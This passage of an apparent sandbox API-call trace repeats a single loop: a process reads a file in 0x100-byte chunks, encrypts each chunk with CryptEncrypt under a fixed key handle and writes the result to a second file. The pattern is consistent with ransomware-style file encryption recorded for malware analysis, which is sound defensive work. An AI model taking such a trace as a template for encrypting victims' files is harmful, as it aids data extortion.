dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.171] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.171] GetLastError () returned 0x0 [0170.171] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.171] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.172] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.172] GetLastError () returned 0x0 [0170.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.172] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.172] GetLastError () returned 0x0 [0170.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.172] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.172] GetLastError () returned 0x0 [0170.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.172] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.172] GetLastError () returned 0x0 [0170.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.172] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.172] GetLastError () returned 0x0 [0170.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.173] GetLastError () returned 0x0 [0170.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.173] GetLastError () returned 0x0 [0170.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.173] GetLastError () returned 0x0 [0170.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.173] GetLastError () returned 0x0 [0170.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.173] GetLastError () returned 0x0 [0170.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.173] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.174] GetLastError () returned 0x0 [0170.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.174] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.174] GetLastError () returned 0x0 [0170.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.174] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.174] GetLastError () returned 0x0 [0170.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.174] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.174] GetLastError () returned 0x0 [0170.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.174] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.174] GetLastError () returned 0x0 [0170.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.175] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.175] GetLastError () returned 0x0 [0170.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.175] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.175] GetLastError () returned 0x0 [0170.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.175] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.175] GetLastError () returned 0x0 [0170.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.175] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.175] GetLastError () returned 0x0 [0170.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.175] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.175] GetLastError () returned 0x0 [0170.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.176] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.176] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.177] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 